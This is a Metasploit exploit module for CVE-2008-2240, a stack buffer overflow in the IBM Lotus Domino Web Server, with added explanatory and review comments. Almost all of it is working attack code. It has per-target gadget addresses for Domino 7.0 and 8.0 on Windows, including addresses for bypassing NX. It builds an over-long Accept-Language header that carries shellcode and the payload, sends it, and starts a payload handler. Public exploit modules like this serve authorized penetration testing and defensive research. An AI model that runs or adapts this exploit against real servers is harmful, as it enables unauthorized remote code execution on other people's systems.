##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2008-2240: a stack buffer overflow in the
# IBM Lotus Domino Web Server triggered by an over-long Accept-Language header
# (per the Description below, builds before 7.0.3FP1 and 8.0.1 are affected).
#
# Structure:
#   * +initialize+ registers the module metadata; each entry in 'Targets' is a
#     build-specific address table consumed by +exploit+ via +target[...]+.
#   * +exploit+ assembles the Accept-Language value and sends a single GET.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers name, description, references, payload constraints and targets.
  #
  # Every target provides 'FixESP' and 'JmpESP'.  Targets whose name carries
  # "(NX)" additionally provide 'FixESI', 'FixEBP', 'Ret' and 'DisableNX';
  # +exploit+ branches on the presence of 'DisableNX' to pick the layout.
  #
  # @param info [Hash] extra module info merged through +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
      'Description'        => %q{
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
        prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
        request with an Accept-Language header greater than 114 bytes.
      },
      'Author'        => [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],
      'License'        => MSF_LICENSE,
      'References'        =>
        [
          ['CVE', '2008-2240'],
          ['OSVDB', '45415'],
          ['BID', '29310'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
        ],
      'DefaultOptions'    =>
        {
          'EXITFUNC'    => 'thread',
        },
      'Privileged'        => true,
      # BadChars lists bytes that must not appear in the encoded payload because
      # they would terminate or split the header value (NUL, LF, space, comma,
      # semicolon).
      'Payload'        =>
        {
          'Space'            => 800,
          'BadChars'        => "\x00\x0a\x20\x2c\x3b",
          'StackAdjustment'    => -3500,
        },
      'Platform'        =>    'win',
      # Addresses below are hard-coded per Domino build / Windows service pack;
      # the trailing comment on each line names the module they were taken from.
      'Targets'        =>
        [

          ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
              'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
              'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
              'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dll
              'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
              'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
            }
          ],

          ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
              'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
              'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
              'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dll
              'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
              'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
            }
          ],

          # No-NX targets carry only the two keys the short layout in #exploit reads.
          ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
              'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
              'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
              'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
              'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
              'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
              'JmpESP'    => 0x6391071e, # jmp esp             @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
              'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
              'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
              'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
              'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
              'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
              'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
            }
          ],

        ],
      'DisclosureDate' => '2008-05-20'))
  end

  # Builds the over-long Accept-Language value and sends one GET request.
  #
  # +lang+ starts as 116 random alphanumeric bytes; fixed-offset slices are then
  # overwritten with little-endian addresses from the selected target, a NUL is
  # appended and the encoded payload follows.  Which slices are written depends
  # on whether the target defines 'DisableNX' (see the target tables above).
  # Afterwards the module starts its payload handler and disconnects.
  #
  # NOTE(review): each slice assignment replaces a fixed-length range of +lang+;
  # the two assembled stubs are assumed to be exactly 15 resp. 16 bytes long,
  # otherwise every later offset in the same branch would shift — confirm.
  #
  # @return [void]
  def exploit
    connect

    lang = rand_text_alphanumeric(116)                # greetz to hateful chris
    lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')            # Fix Second crash (esi)
    lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')            # Fix Second crash (eax)
    lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')            # Fix First crash
    lang[ 112, 4 ] = [target['FixESP']].pack('V')            # 1
    lang << "\x00"
    lang << payload.encoded

    # Targets without 'DisableNX' (the "NO NX" entries) use the short layout;
    # NX targets also place FixESI/FixEBP/Ret/DisableNX.
    # NOTE(review): `unless target['DisableNX']` is the idiomatic spelling.
    if(not target['DisableNX'])
      lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string        # 4
      lang[ 80,  4 ] = [target['JmpESP']].pack('V')        # 2
      lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)    # 3 jmp back to top
    else
      lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string    # 8
      lang[ 80,  4 ] = [target['FixESI']].pack('V')        # 2
      lang[ 84,  4 ] = [target['FixEBP']].pack('V')        # 3
      lang[ 88,  4 ] = [target['Ret']].pack('V')        # 4
      lang[ 92,  4 ] = [target['JmpESP']].pack('V')        # 6
      lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)    # 7  jmp back to top
      lang[ 108, 4 ] = [target['DisableNX']].pack('V')    # 5
    end

    # Random .nsf path with a single high-ASCII query byte.
    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)    # Trigger

    print_status("Trying target #{target.name}...")
    # The trailing 5 is passed positionally to send_request_raw; presumably a
    # response timeout in seconds — verify against HttpClient.
    send_request_raw({
            'uri'            => "#{uri}",
            'method'        => 'GET',
            'headers'        =>
            {
              'Accept'        => '*/*',
              'Accept-Language'    => "#{lang}",
              'Accept-Encoding'    => 'gzip,deflate',
              'Keep-Alive'        => '300',
              'Connection'        => 'keep-alive',
              'User-Agent'        => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
            }
          }, 5)
    handler
    disconnect
  end
end